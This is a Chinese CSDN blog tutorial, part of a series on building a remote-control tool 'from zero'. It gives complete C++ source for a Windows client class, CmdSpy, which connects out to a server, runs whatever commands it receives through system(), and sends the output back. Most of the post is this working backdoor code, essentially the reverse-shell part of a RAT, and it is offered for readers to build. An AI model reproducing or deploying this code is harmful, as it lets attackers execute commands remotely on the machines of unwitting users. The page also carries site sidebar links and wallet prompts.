从零开始做远控 第十一篇 命令行控制

最新推荐文章于 2024-09-28 11:42:36 发布
最新推荐文章于 2024-09-28 11:42:36 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: 远控 文章标签: win32 网络安全 c++ 远程控制 远控
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sumkee911/article/details/53870899
版权

如果你从没看过这系列教程请点击:从零开始做远控 简介篇


命令行控制

这两节我们要编写用CMD指令控制客户端的部分。


这一节编写客户端:
CmdSpy类:
1.创建一个CmdSpy类来接收并处理服务端发过来的cmd指令。


2.处理cmd指令并获取返回值的函数: 
std::string CmdSpy::execCmd(std::string cmd)
{
    // 锁定函数,其他线程不能进来
    EnterCriticalSection(&gCs);


    // 执行指令,然后保存在临时文件
    system(cmd.append(" > ").append(gTmpReturnFile).data());


    // 打开临时文件
    FILE *fp = fopen(gTmpReturnFile.data(), "rb");
    if (!fp) {
        std::cout << "Failed to open return file of cmd\n";
        std::fflush(stdout);


        // 解除函数锁定
        LeaveCriticalSection(&gCs);


        return std::string();
    }


    // 获取文件大小
    fseek(fp, 0, SEEK_END);
    unsigned int len = ftell(fp);
    rewind(fp);


    // 读取文件
    char data[len];
    fread(data, 1, len, fp);


    // 关闭文件
    fclose(fp);


    // 删除临时文件
    DeleteFileA(gTmpReturnFile.data());


    // 解除函数锁定
    LeaveCriticalSection(&gCs);


    return std::string(data, len);
}


代码:

cmdspy.h

/*
 *
 *  Author: sumkee911@gmail.com
 *  Date: 25-12-2016
 *  Brief: 实现Cmd命令控制
 *
 */

#ifndef CMDSPY_H
#define CMDSPY_H

#include "tcpsocket.h"
#include <windows.h>
#include <iostream>

class CmdSpy
{
public:
    CmdSpy();
    ~CmdSpy();

    // 客户端发送到服务端的指令
    const std::string CmdPwd = "PWD";    // 当前文件位置

    // 分割符和结束符号
    const std::string CmdSplit = ";";
    const std::string CmdEnd = "\r\n";

    // 这个类的入口函数
    static void startByNewThread(std::string domain, int port);
    static DWORD WINAPI threadProc(LPVOID args);
    static void startCmdSpy(std::string domain, int port);
    static void addDataToBuffer(TcpSocket *sock, std::string &buf, char *data, int size);

    // 执行cmd指令
    static std::string execCmd(std::string cmd);
    // 获取当前位置
    static std::string getPWD();
};

#endif // CMDSPY_H


cmdspy.cpp

#include "cmdspy.h"

// 互挤体,用来确保线程安全
static CRITICAL_SECTION gCs;
// 初始化类
static CmdSpy gSpy;
// 临时饭后信息保存路径
static std::string gTmpReturnFile = "cmd_return.tmp";

CmdSpy::CmdSpy()
{
    // 初始化互挤体
    InitializeCriticalSection(&gCs);
}

CmdSpy::~CmdSpy()
{
    // 删除互挤体
    DeleteCriticalSection(&gCs);
}

void CmdSpy::startByNewThread(std::string domain, int port)
{
    // 将域名和端口数据转换成一个字符指针类型
    char *args = new char[MAX_PATH+sizeof(int)];
    domain.reserve(MAX_PATH);
    memcpy(args,domain.data(), MAX_PATH);
    memcpy(args+MAX_PATH,(char*)&port, sizeof(int));

    // 创建新线程
    HANDLE h = CreateThread(NULL,0, CmdSpy::threadProc,(LPVOID)args,0,NULL);
    if (!h) {
        std::cout << "Failed to create new thread" << std::endl;
        std::fflush(stdout);
    }
}

DWORD CmdSpy::threadProc(LPVOID args)
{
    char domain[MAX_PATH];
    memcpy(domain, args, MAX_PATH);
    int port = *((int*)((char*)args+MAX_PATH));

    // 开始监控
    startCmdSpy(domain, port);

    // 释放参数
    delete (char *)args;
    return true;
}

void CmdSpy::startCmdSpy(std::string domain, int port)
{
    // 创建socket并连接至服务端
    TcpSocket sock;
    if (!sock.connectTo(domain, port)) {
        std::cout << "Failed to connect cmd spy server " <<
                     domain << ":" << port << std::endl;
        std::fflush(stdout);
        return;
    }

    // 开始监控消息
    std::cout << "Started cmd spy" << std::endl;
    std::fflush(stdout);

    // 死循环,不断从服务端接收数据
    const int packetSize = 800;
    char szData[packetSize];
    int ret;
    std::string buf;

    while (1) {
        ret = sock.recvData(szData, packetSize);

        // 出现错误
        if (ret == SOCKET_ERROR || ret == 0) {
            break;
        }

       // 把数据加入到缓冲区
       addDataToBuffer(&sock, buf, szData, ret);
    }

    // 完成
    std::cout << "Finished cmd spy" << std::endl;
    std::fflush(stdout);
}

void CmdSpy::addDataToBuffer(TcpSocket *sock, std::string &buf, char *data, int size)
{
    buf.append(data,size);

    // 把数据转换成指令模式
    int endIndex;
    while ((endIndex = buf.find(gSpy.CmdEnd)) >= 0) {
        std::string cmd = buf.substr(0,endIndex);
        buf.erase(0, endIndex+gSpy.CmdEnd.length());

        // 处理指令
        std::string retData = execCmd(cmd);
        // 发送Cmd命令返回数据到服务端
        sock->sendData(retData.data(), retData.size());

        // 发送当前文件位置
        std::string pwd = gSpy.CmdPwd;
        pwd.append(gSpy.CmdSplit);
        pwd.append(getPWD());

        // 发送Cmd命令返回数据到服务端
        sock->sendData(pwd.data(), pwd.size());
    }
}

std::string CmdSpy::execCmd(std::string cmd)
{
    // 锁定函数,其他线程不能进来
    EnterCriticalSection(&gCs);

    // 执行指令,然后保存在临时文件
    system(cmd.append(" > ").append(gTmpReturnFile).data());

    // 打开临时文件
    FILE *fp = fopen(gTmpReturnFile.data(), "rb");
    if (!fp) {
        std::cout << "Failed to open return file of cmd\n";
        std::fflush(stdout);

        // 解除函数锁定
        LeaveCriticalSection(&gCs);

        return std::string();
    }

    // 获取文件大小
    fseek(fp, 0, SEEK_END);
    unsigned int len = ftell(fp);
    rewind(fp);

    // 读取文件
    char data[len];
    fread(data, 1, len, fp);

    // 关闭文件
    fclose(fp);

    // 删除临时文件
    DeleteFileA(gTmpReturnFile.data());

    // 解除函数锁定
    LeaveCriticalSection(&gCs);

    return std::string(data, len);
}

std::string CmdSpy::getPWD()
{
    return execCmd("cd");
}


下载这一节的完整代码
sumkee911
关注
专栏目录
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
远控开发教程
08-09
第二课 上线分组和更改分组 从这节课开始我们就实践添加GH0ST的功能 代码我都整理好了 跟着我就可以的 首先是添加上线分组 先从服务端开始添加代码
windows系统使用代码编辑器远程连接linux主机的项目并直接进行修改和命令行操作的方法
最新发布
qq_42750608的博客
09-28 452
windows系统使用代码编辑器远程连接linux主机的项目并直接进行修改和命令行操作的方法
VC远程控制编程教程
10-03
VC远程控制编程教程~~~系列教程六~`````
C/C++远控编写第一节【6】
司徒荆的博客
05-08 711
添加菜单消息响应的函数:终端管理 进程管理 窗口管理 桌面管理 文件管理 语音管理 视频管理 服务管理 注册表管理。
Zero远控__完整代码
12-26
Zero远控,完整代码
Zero远控完整代码(2017-5-29)
05-29
Zero远控完整代码
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
热门推荐
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
Zero远控完整源代码和已编译程序
05-19
Zero远控,远控教程
PsyRat 源代码,初学写远控的可以看看。
08-03
PsyRat代码,功能简单,适合初学者入门学习。小小推荐下。
远程控制C语言代码
11-29
远程控制程序代码,C。远程控制程序SockSpy
c# 编写的一款远控软件 (源码)
03-18
c# 代码编写的远控软件,三是功能不是太完善 里面附加源码。。。。。。。。
C# 编写的远控程序
09-09
C# 编写的远控程序
C/C++远控编写第一节【8】
司徒荆的博客
05-09 890
为对话框添加状态条并在态条上显示文字
远控编写09】客户端界面的设计和编写--为对话框添加入工具条
移动开发记录
02-13 136
一.基础知识: 1.工具条类:CToolBar.(在MSDN中查看其成员Member) ①CToolBar::CreateExCall this function to create a Windows toolbar (a child window) and associate it with the CToolBar object. virtual BOOL CreateEx( ...
从零开始远控 完满结束 发布完整源代码及已编译好的程序
sumkee911‘s coding
12-26 1万+
如果你从没看过这系列教程请点击:从零开始远控 简介篇完整代码下載:1.Zero远控完整代码及已编译好的程序下载(VC版客户端,QT版客户端,QT版服务器)github完整源代碼:https://github.com/joliph/ZeroNet总结篇经过了一个礼拜的工作,我们的Zero远控终于完成了,麻雀虽小,但功能齐全,完美实现了:“屏幕监控,键盘监控,文件监控,Cmd命令控制”。你在学习Ze...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值